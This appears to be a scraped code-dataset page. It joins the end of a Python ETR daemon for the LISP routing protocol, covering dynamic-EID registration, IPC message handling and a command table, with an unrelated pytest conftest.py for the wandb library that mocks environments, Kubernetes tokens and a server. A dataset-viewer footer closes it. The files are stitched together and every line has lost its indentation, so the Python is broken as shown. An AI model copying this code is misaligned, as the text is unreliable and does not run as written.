if (db.dynamic_eids.has_key(eid_str)): dyn_eid = db.dynamic_eids[eid_str]
if (dyn_eid == None and interface == None):
lisp.lprint("ITR/ETR state mismatch for {}".format( \
lisp.green(eid_str, False)))
return
#endif
#
# Check if ITR is changing the interface to the same interface, meaning
# it is confused. Otherwise, the IPC is an interface change. Don't register
# in this case.
#
if (dyn_eid and interface):
if (dyn_eid.interface == interface):
lisp.lprint("ITR sent redundant IPC for {}".format( \
lisp.green(eid_str, False)))
else:
lisp.lprint("Dynamic-EID {} interface change, {} -> {}".format( \
lisp.green(eid_str, False), dyn_eid.interface, interface))
dyn_eid.interface = interface
#endif
return
#endif
#
# Add new entry and register it.
#
if (interface):
dyn_eid = lisp.lisp_dynamic_eid()
dyn_eid.dynamic_eid.copy_address(eid)
dyn_eid.interface = interface
dyn_eid.get_timeout(interface)
db.dynamic_eids[eid_str] = dyn_eid
reg = lisp.bold("Registering", False)
eid_str = lisp.bold(eid_str, False)
lisp.lprint("{} dynamic-EID {} on interface {}, timeout {}".format(reg,
lisp.green(eid_str, False), interface, dyn_eid.timeout))
lisp_build_map_register(lisp_send_sockets, None, eid, None, False)
#
# Add /32 to routing table.
#
if (lisp.lisp_is_macos() == False):
eid_str = eid.print_prefix_no_iid()
cmd = "ip route add {} dev {}".format(eid_str, interface)
os.system(cmd)
#endif
return
#endif
#
# Remove existig entry and deregister it.
#
if (db.dynamic_eids.has_key(eid_str)):
interface = db.dynamic_eids[eid_str].interface
dereg = lisp.bold("Deregistering", False)
lisp.lprint("{} dynamic-EID {}".format(dereg,
lisp.green(eid_str, False)))
lisp_build_map_register(lisp_send_sockets, 0, eid, None, False)
db.dynamic_eids.pop(eid_str)
#
# Delete /32 from routing table.
#
if (lisp.lisp_is_macos() == False):
eid_str = eid.print_prefix_no_iid()
cmd = "ip route delete {} dev {}".format(eid_str, interface)
os.system(cmd)
#endif
#endif
return
#enddef
#
# lisp_etr_process_rtr_updown
#
# Process IPC message from lisp-itr. It is telling the lisp-etr process if
# RLOC-probing has determined if the RTR has gone up or down. And therefore
# if it should be registered to the mapping system.
#
def lisp_etr_process_rtr_updown(ipc):
if (lisp.lisp_register_all_rtrs): return
opcode, rtr_str, status = ipc.split("%")
if (lisp.lisp_rtr_list.has_key(rtr_str) == False): return
lisp.lprint("Process ITR IPC message, RTR {} has gone {}".format(
lisp.red(rtr_str, False), lisp.bold(status, False)))
rtr = lisp.lisp_rtr_list[rtr_str]
if (status == "down"):
lisp.lisp_rtr_list[rtr_str] = None
return
#endif
rtr = lisp.lisp_address(lisp.LISP_AFI_IPV4, rtr_str, 32, 0)
lisp.lisp_rtr_list[rtr_str] = rtr
return
#enddef
#
# lisp_etr_process_nonce_ipc
#
# Process an nonce IPC message from the ITR. It wants to know when a nonce
# is echoed from a remote ITR.
#
def lisp_etr_process_nonce_ipc(ipc):
x, opcode, rloc_str, nonce = ipc.split("%")
nonce = int(nonce, 16)
echo_nonce = lisp.lisp_get_echo_nonce(None, rloc_str)
if (echo_nonce == None): echo_nonce = lisp.lisp_echo_nonce(rloc_str)
if (opcode == "R"):
echo_nonce.request_nonce_sent = nonce
lisp.lprint("Waiting for echo-nonce 0x{} from {}".format( \
lisp.lisp_hex_string(nonce), lisp.red(echo_nonce.rloc_str, False)))
elif (opcode == "E"):
echo_nonce.echo_nonce_sent = nonce
lisp.lprint("Sent echo-nonce 0x{} to {}".format( \
lisp.lisp_hex_string(nonce), lisp.red(echo_nonce.rloc_str, False)))
#endif
return
#enddef
#
# ETR commands procssed by this process.
#
lisp_etr_commands = {
"lisp xtr-parameters" : [lispconfig.lisp_xtr_command, {
"rloc-probing" : [True, "yes", "no"],
"nonce-echoing" : [True, "yes", "no"],
"data-plane-security" : [True, "yes", "no"],
"data-plane-logging" : [True, "yes", "no"],
"frame-logging" : [True, "yes", "no"],
"flow-logging" : [True, "yes", "no"],
"nat-traversal" : [True, "yes", "no"],
"checkpoint-map-cache" : [True, "yes", "no"],
"ipc-data-plane" : [True, "yes", "no"],
"decentralized-push-xtr" : [True, "yes", "no"],
"decentralized-pull-xtr-modulus" : [True, 1, 0xff],
"decentralized-pull-xtr-dns-suffix" : [True],
"register-reachable-rtrs" : [True, "yes", "no"],
"program-hardware" : [True, "yes", "no"] }],
"lisp interface" : [lispconfig.lisp_interface_command, {
"interface-name" : [True],
"device" : [True],
"instance-id" : [True, 0, 0xffffffff],
"dynamic-eid" : [True],
"dynamic-eid-device" : [True],
"lisp-nat" : [True, "yes", "no"],
"dynamic-eid-timeout" : [True, 0, 0xff] }],
"lisp map-server" : [lisp_map_server_command, {
"ms-name" : [True],
"address" : [True],
"dns-name" : [True],
"authentication-type" : [False, "sha1", "sha2"],
"authentication-key" : [False],
"encryption-key" : [False],
"proxy-reply" : [False, "yes", "no"],
"want-map-notify" : [False, "yes", "no"],
"merge-registrations" : [False, "yes", "no"],
"refresh-registrations" : [False, "yes", "no"],
"site-id" : [False, 1, 0xffffffffffffffff] }],
"lisp database-mapping" : [lisp_etr_database_mapping_command, {
"prefix" : [],
"mr-name" : [True],
"ms-name" : [True],
"instance-id" : [True, 0, 0xffffffff],
"secondary-instance-id" : [True, 0, 0xffffffff],
"eid-prefix" : [True],
"group-prefix" : [True],
"dynamic-eid" : [True, "yes", "no"],
"signature-eid" : [True, "yes", "no"],
"rloc" : [],
"rloc-record-name" : [True],
"elp-name" : [True],
"geo-name" : [True],
"rle-name" : [True],
"json-name" : [True],
"address" : [True],
"interface" : [True],
"priority" : [True, 0, 255],
"weight" : [True, 0, 100] }],
"lisp explicit-locator-path" : [lispconfig.lisp_elp_command, {
"elp-name" : [False],
"elp-node" : [],
"address" : [True],
"probe" : [True, "yes", "no"],
"strict" : [True, "yes", "no"],
"eid" : [True, "yes", "no"] }],
"lisp replication-list-entry" : [lispconfig.lisp_rle_command, {
"rle-name" : [False],
"rle-node" : [],
"address" : [True],
"level" : [True, 0, 255] }],
"lisp geo-coordinates" : [lispconfig.lisp_geo_command, {
"geo-name" : [False],
"geo-tag" : [False] }],
"lisp json" : [lispconfig.lisp_json_command, {
"json-name" : [False],
"json-string" : [False] }],
"lisp group-mapping" : [lisp_group_mapping_command, {
"group-name" : [False],
"ms-name" : [True],
"group-prefix" : [False],
"instance-id" : [True, 0, 0xffffffff],
"rle-address" : [False],
"sources" : [],
"address" : [True] }],
"show database-mapping" : [lisp_etr_show_command, { }],
"show etr-keys" : [lisp_etr_show_keys_command, {}],
"show etr-dynamic-eid" : [lispconfig.lisp_show_dynamic_eid_command, { }]
}
#------------------------------------------------------------------------------
#
# Main entry point for process.
#
if (lisp_etr_startup() == False):
lisp.lprint("lisp_etr_startup() failed")
lisp.lisp_print_banner("ETR abnormal exit")
exit(1)
#endif
socket_list = [lisp_ephem_socket, lisp_ipc_listen_socket]
while (True):
try: ready_list, w, x = select.select(socket_list, [], [])
except: break
#
# Process Info-Reply messages received on ephemeral port.
#
if (lisp_ephem_socket in ready_list):
opcode, source, port, packet = \
lisp.lisp_receive(lisp_ephem_socket, False)
if (source == ""): break
if (port == lisp.LISP_DATA_PORT):
lisp_etr_nat_data_plane(lisp_raw_socket, packet, source)
else:
if (lisp.lisp_is_rloc_probe_request(packet[0])):
lisp.lprint("ETR ignoring RLOC-probe request, using pcap")
continue
#endif
send_register = lisp.lisp_parse_packet(lisp_send_sockets, packet,
source, port)
#
# Info-Reply from map-server has new RTR-list, trigger a
# Map-Register and a Info-Request to the RTR.
#
if (send_register):
lisp_etr_info_timer = threading.Timer(0,
lisp_etr_process_info_timer, [None])
lisp_etr_info_timer.start()
lisp_register_timer = threading.Timer(0,
lisp_process_register_timer, [lisp_send_sockets])
lisp_register_timer.start()
#endif
#endif
#endif
#
# Process either commands, an IPC data-packet (for testing), or any
# protocol message on the IPC listen socket.
#
if (lisp_ipc_listen_socket in ready_list):
opcode, source, port, packet = \
lisp.lisp_receive(lisp_ipc_listen_socket, True)
if (source == ""): break
if (opcode == "command"):
if (packet.find("learn%") != -1):
lisp_etr_discover_eid(packet)
elif (packet.find("nonce%") != -1):
lisp_etr_process_nonce_ipc(packet)
elif (packet.find("clear%") != -1):
lispconfig.lisp_clear_decap_stats(packet)
elif (packet.find("rtr%") != -1):
lisp_etr_process_rtr_updown(packet)
elif (packet.find("stats%") != -1):
packet = packet.split("%")[-1]
lisp.lisp_process_data_plane_decap_stats(packet, None)
else:
lispconfig.lisp_process_command(lisp_ipc_listen_socket,
opcode, packet, "lisp-etr", [lisp_etr_commands])
#endif
elif (opcode == "api"):
lisp.lisp_process_api("lisp-etr", lisp_ipc_listen_socket, packet)
else:
if (lisp.lisp_is_rloc_probe_request(packet[0])):
lisp.lprint("ETR ignoring RLOC-probe request, using pcap")
continue
#endif
lisp.lisp_parse_packet(lisp_send_sockets, packet, source, port)
#endif
#endif
#endwhile
lisp_etr_shutdown()
lisp.lisp_print_banner("ETR normal exit")
exit(0)
#------------------------------------------------------------------------------
|
conftest.py
|
import requests_mock
import os
from click.testing import CliRunner
import pytest
from wandb.history import History
from tests.api_mocks import *
import wandb
from wandb import wandb_run
from wandb.apis import InternalApi
import six
import json
import sys
import threading
import logging
from multiprocessing import Process
from vcr.request import Request
from wandb import wandb_socket
from wandb import env
from wandb import util
from wandb.wandb_run import Run
from tests import utils
from tests.mock_server import create_app
def pytest_runtest_setup(item):
wandb.reset_env()
wandb.uninit()
global_settings = os.path.expanduser("~/.config/wandb/settings")
if os.path.exists(global_settings):
try:
os.remove(global_settings)
except OSError:
pass
# This is used to find tests that are leaking outside of tmp directories
os.environ["WANDB_DESCRIPTION"] = item.parent.name + "#" + item.name
def request_repr(self):
try:
body = json.loads(self.body)
query = body.get("query") or "no_query"
render = query.split("(")[0].split("\n")[0] + " - vars: " + str(body.get("variables", {}).get("files", {}))
except (ValueError, TypeError):
render = "BINARY"
return "({}) {} - {}".format(self.method, self.uri, render)
Request.__repr__ = request_repr
# To enable VCR logging uncomment below
#logging.basicConfig() # you need to initialize logging, otherwise you will not see anything from vcrpy
#vcr_log = logging.getLogger("vcr")
#vcr_log.setLevel(logging.INFO)
@pytest.fixture(scope='module')
def vcr_config():
def replace_body(request):
if "storage.googleapis.com" in request.uri:
request.body = "BINARY DATA"
elif "/file_stream" in request.uri:
request.body = json.dumps({"files": list(json.loads(request.body).get("files", {}.keys()))})
return request
def replace_response_body(response, *args):
"""Remove gzip response from pypi"""
if response["headers"].get("Access-Control-Expose-Headers") == ['X-PyPI-Last-Serial']:
if response["headers"].get("Content-Encoding"):
del response["headers"]["Content-Encoding"]
response["body"]["string"] = '{"info":{"version": "%s"}' % wandb.__version__
return response
return {
# Replace the Authorization request header with "DUMMY" in cassettes
"filter_headers": [('authorization', 'DUMMY')],
"match_on": ['method', 'uri', 'query', 'graphql'],
"before_record": replace_body,
"before_record_response": replace_response_body,
}
@pytest.fixture(scope='module')
def vcr(vcr):
def vcr_graphql_matcher(r1, r2):
if "/graphql" in r1.uri and "/graphql" in r2.uri:
body1 = json.loads(r1.body.decode("utf-8"))
body2 = json.loads(r2.body.decode("utf-8"))
return body1["query"].strip() == body2["query"].strip()
elif "/file_stream" in r1.uri and "/file_stream" in r2.uri:
body1 = json.loads(r1.body.decode("utf-8"))
body2 = json.loads(r2.body.decode("utf-8"))
return body1["files"] == body2["files"]
vcr.register_matcher('graphql', vcr_graphql_matcher)
return vcr
@pytest.fixture
def local_netrc(monkeypatch):
with CliRunner().isolated_filesystem():
# TODO: this seems overkill...
origexpand = os.path.expanduser
def expand(path):
return os.path.realpath("netrc") if "netrc" in path else origexpand(path)
monkeypatch.setattr(os.path, "expanduser", expand)
yield
@pytest.fixture
def history():
with CliRunner().isolated_filesystem():
yield Run().history
@pytest.fixture
def wandb_init_run(request, tmpdir, request_mocker, mock_server, monkeypatch, mocker, capsys, local_netrc):
"""Fixture that calls wandb.init(), yields a run (or an exception) that
gets created, then cleans up afterward. This is meant to test the logic
in wandb.init, it should generally not spawn a run_manager. If you need
to test run_manager logic use that fixture.
"""
# save the environment so we can restore it later. pytest
# may actually do this itself. didn't check.
orig_environ = dict(os.environ)
orig_namespace = None
run = None
# Reset the tensorboard and pytest state
wandb.tensorboard.reset_state()
wandb._global_watch_idx = 0
try:
with CliRunner().isolated_filesystem():
if request.node.get_closest_marker('jupyter'):
def fake_ipython():
class Jupyter(object):
__module__ = "jupyter"
def __init__(self):
class Hook(object):
def register(self, what, where):
pass
class Pub(object):
def publish(self, **kwargs):
pass
class Hist(object):
def get_range(self, **kwargs):
return [[None, 1, ('#source code', None)]]
self.events = Hook()
self.display_pub = Pub()
self.history_manager = Hist()
def register_magics(self, magic):
pass
return Jupyter()
wandb.get_ipython = fake_ipython
wandb.jupyter.get_ipython = fake_ipython
# no i/o wrapping - it breaks pytest
os.environ['WANDB_MODE'] = 'clirun'
if request.node.get_closest_marker('headless'):
mocker.patch('subprocess.Popen')
else:
def mock_headless(run, cloud=True):
print("_init_headless called with cloud=%s" % cloud)
mocker.patch('wandb._init_headless', mock_headless)
if not request.node.get_closest_marker('unconfigured'):
os.environ['WANDB_API_KEY'] = 'test'
os.environ['WANDB_ENTITY'] = 'test'
os.environ['WANDB_PROJECT'] = 'unit-test-project'
else:
# when unconfigured we enable run mode to test missing creds
os.environ['WANDB_MODE'] = 'run'
monkeypatch.setattr('wandb.apis.InternalApi.api_key', None)
monkeypatch.setattr(
'getpass.getpass', lambda x: "0123456789012345678901234567890123456789")
assert InternalApi().api_key == None
os.environ['WANDB_RUN_DIR'] = str(tmpdir)
if request.node.get_closest_marker('silent'):
os.environ['WANDB_SILENT'] = "true"
orig_namespace = vars(wandb)
assert wandb.run is None
# Mock out run_manager, we add it to run to access state in tests
orig_rm = wandb.run_manager.RunManager
mock = mocker.patch('wandb.run_manager.RunManager')
def fake_init(run, port=None, output=None, cloud=True):
print("Initialized fake run manager")
rm = fake_run_manager(mocker, run, cloud=cloud, rm_class=orig_rm)
rm._block_file_observer()
run.run_manager = rm
return rm
mock.side_effect = fake_init
if request.node.get_closest_marker('args'):
kwargs = request.node.get_closest_marker('args').kwargs
# Unfortunate to enable the test to work
if kwargs.get("dir"):
del os.environ['WANDB_RUN_DIR']
if kwargs.get("tensorboard"):
# The test uses tensorboardX so we need to be sure it's imported
# we use get_module because tensorboardX isn't available in py2
wandb.util.get_module("tensorboardX")
if kwargs.get("error"):
err = kwargs["error"]
del kwargs['error']
if err == "io":
@classmethod
def error(cls):
raise IOError
monkeypatch.setattr(
'wandb.wandb_run.Run.from_environment_or_defaults', error)
elif err == "socket":
class Error(object):
@property
def port(self):
return 123
def listen(self, secs):
return False, None
monkeypatch.setattr("wandb.wandb_socket.Server", Error)
if kwargs.get('k8s') is not None:
token_path = "/var/run/secrets/kubernetes.io/serviceaccount/token"
crt_path = "/var/run/secrets/kubernetes.io/serviceaccount/ca.crt"
orig_exist = os.path.exists
def exists(path):
return True if path in token_path else orig_exist(path)
def magic(path, *args, **kwargs):
if path == token_path:
return six.StringIO('token')
mocker.patch('wandb.util.open', magic, create=True)
mocker.patch('wandb.util.os.path.exists', exists)
os.environ["KUBERNETES_SERVICE_HOST"] = "k8s"
os.environ["KUBERNETES_PORT_443_TCP_PORT"] = "123"
os.environ["HOSTNAME"] = "test"
if kwargs["k8s"]:
request_mocker.register_uri("GET", "https://k8s:123/api/v1/namespaces/default/pods/test",
content=b'{"status":{"containerStatuses":[{"imageID":"docker-pullable://test@sha256:1234"}]}}')
else:
request_mocker.register_uri("GET", "https://k8s:123/api/v1/namespaces/default/pods/test",
content=b'{}', status_code=500)
del kwargs["k8s"]
if kwargs.get('sagemaker'):
del kwargs['sagemaker']
config_path = "/opt/ml/input/config/hyperparameters.json"
resource_path = "/opt/ml/input/config/resourceconfig.json"
secrets_path = "secrets.env"
os.environ['TRAINING_JOB_NAME'] = 'sage'
os.environ['CURRENT_HOST'] = 'maker'
orig_exist = os.path.exists
def exists(path):
return True if path in (config_path, secrets_path, resource_path) else orig_exist(path)
mocker.patch('wandb.os.path.exists', exists)
def magic(path, *args, **kwargs):
if path == config_path:
return six.StringIO('{"fuckin": "A"}')
elif path == resource_path:
return six.StringIO('{"hosts":["a", "b"]}')
elif path == secrets_path:
return six.StringIO('WANDB_TEST_SECRET=TRUE')
else:
return six.StringIO()
mocker.patch('wandb.open', magic, create=True)
mocker.patch('wandb.util.open', magic, create=True)
elif kwargs.get("tf_config"):
os.environ['TF_CONFIG'] = json.dumps(kwargs['tf_config'])
del kwargs['tf_config']
elif kwargs.get("env"):
for k, v in six.iteritems(kwargs["env"]):
os.environ[k] = v
del kwargs["env"]
else:
kwargs = {}
if request.node.get_closest_marker('resume'):
# env was leaking when running the whole suite...
if os.getenv(env.RUN_ID):
del os.environ[env.RUN_ID]
os.mkdir(wandb.wandb_dir())
with open(os.path.join(wandb.wandb_dir(), wandb_run.RESUME_FNAME), "w") as f:
f.write(json.dumps({"run_id": "test"}))
try:
print("Initializing with", kwargs)
run = wandb.init(**kwargs)
if request.node.get_closest_marker('resume') or request.node.get_closest_marker('mocked_run_manager'):
# Reset history
run._history = None
rm = wandb.run_manager.RunManager(run)
rm.init_run(os.environ)
if request.node.get_closest_marker('mock_socket'):
run.socket = mocker.MagicMock()
assert run is wandb.run
assert run.config is wandb.config
except wandb.LaunchError as e:
print("!!! wandb LaunchError raised")
run = e
yield run
if hasattr(run, "run_manager"):
print("Shutting down run manager")
run.run_manager.test_shutdown()
finally:
# restore the original environment
os.environ.clear()
os.environ.update(orig_environ)
wandb.uninit()
wandb.get_ipython = lambda: None
assert vars(wandb) == orig_namespace
def fake_run_manager(mocker, run=None, cloud=True, rm_class=wandb.run_manager.RunManager):
# NOTE: This will create a run directory so make sure it's called in an isolated file system
# We have an optional rm_class object because we mock it above so we need it before it's mocked
api = InternalApi(load_settings=False)
api.set_setting('project', 'testing')
if wandb.run is None:
wandb.run = run or Run()
wandb.config = wandb.run.config
wandb.run._api = api
wandb.run._mkdir()
wandb.run.socket = wandb_socket.Server()
api.set_current_run_id(wandb.run.id)
mocker.patch('wandb.apis.internal.FileStreamApi')
api._file_stream_api = mocker.MagicMock()
run_manager = rm_class(wandb.run, cloud=cloud, port=wandb.run.socket.port)
class FakeProc(object):
def poll(self):
return None
def exit(self, code=0):
return None
run_manager.proc = FakeProc()
run_manager._meta = mocker.MagicMock()
run_manager._stdout_tee = mocker.MagicMock()
run_manager._stderr_tee = mocker.MagicMock()
run_manager._output_log = mocker.MagicMock()
run_manager._stdout_stream = mocker.MagicMock()
run_manager._stderr_stream = mocker.MagicMock()
run_manager.mirror_stdout_stderr = mocker.MagicMock()
run_manager.unmirror_stdout_stderr = mocker.MagicMock()
socket_thread = threading.Thread(
target=wandb.run.socket.listen)
socket_thread.start()
run_manager._socket.ready()
thread = threading.Thread(
target=run_manager._sync_etc)
thread.daemon = True
thread.start()
def test_shutdown():
if wandb.run and wandb.run.socket:
wandb.run.socket.done()
# TODO: is this needed?
socket_thread.join()
thread.join()
run_manager.test_shutdown = test_shutdown
run_manager._unblock_file_observer()
run_manager._file_pusher._push_function = mocker.MagicMock()
return run_manager
@pytest.fixture
def run_manager(mocker, mock_server):
"""This fixture emulates the run_manager headless mode in a single process
Just call run_manager.test_shutdown() to join the threads
"""
# Reset the tensorboard state
wandb.tensorboard.reset_state()
with CliRunner().isolated_filesystem():
run_manager = fake_run_manager(mocker)
yield run_manager
wandb.uninit()
@pytest.fixture
def loggedin():
orig_environ = dict(os.environ)
try:
with CliRunner().isolated_filesystem():
os.environ["WANDB_API_KEY"] = "X"*40
yield os.environ
finally:
os.environ.clear()
os.environ.update(orig_environ)
wandb.uninit()
@pytest.fixture
def dryrun():
orig_environ = dict(os.environ)
try:
with CliRunner().isolated_filesystem():
os.environ["WANDB_MODE"] = "dryrun"
yield os.environ
finally:
os.environ.clear()
os.environ.update(orig_environ)
wandb.uninit()
# "Error: 'Session' object has no attribute 'request'""
# @pytest.fixture(autouse=True)
# def no_requests(monkeypatch):
# monkeypatch.delattr("requests.sessions.Session.request")
@pytest.fixture
def request_mocker(request):
"""
:param request: pytest request object for cleaning up.
:return: Returns instance of requests mocker used to mock HTTP calls.
"""
m = requests_mock.Mocker()
m.start()
request.addfinalizer(m.stop)
return m
@pytest.fixture(autouse=True)
def preserve_environ():
environ = dict(os.environ)
try:
yield
finally:
os.environ.clear()
os.environ.update(environ)
@pytest.fixture(autouse=True)
def check_environ():
"""Warn about WANDB_ environment variables the user has set
Sometimes it's useful to set things like WANDB_DEBUG intentionally, or
set other things for hacky debugging, but we want to make sure the user
knows about it.
"""
# we ignore WANDB_DESCRIPTION because we set it intentionally in
# pytest_runtest_setup()
wandb_keys = [key for key in os.environ.keys() if key.startswith(
'WANDB_') and key not in ['WANDB_TEST', 'WANDB_DESCRIPTION']]
if wandb_keys:
wandb.termwarn('You have WANDB_ environment variable(s) set. These may interfere with tests:')
for key in wandb_keys:
wandb.termwarn(' {} = {}'.format(key, repr(os.environ[key])))
@pytest.fixture
def mock_server(mocker, request_mocker):
app = create_app()
mock = utils.RequestsMock(app.test_client(), {})
mocker.patch("gql.transport.requests.requests", mock)
mocker.patch("wandb.apis.file_stream.requests", mock)
mocker.patch("wandb.apis.internal.requests", mock)
return mock
@pytest.fixture
def live_mock_server(request):
if request.node.get_closest_marker('port'):
port = request.node.get_closest_marker('port').args[0]
else:
port = 8765
app = create_app()
server = Process(target=app.run, kwargs={"port": port, "debug": True, "use_reloader": False})
server.start()
yield server
server.terminate()
server.join()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.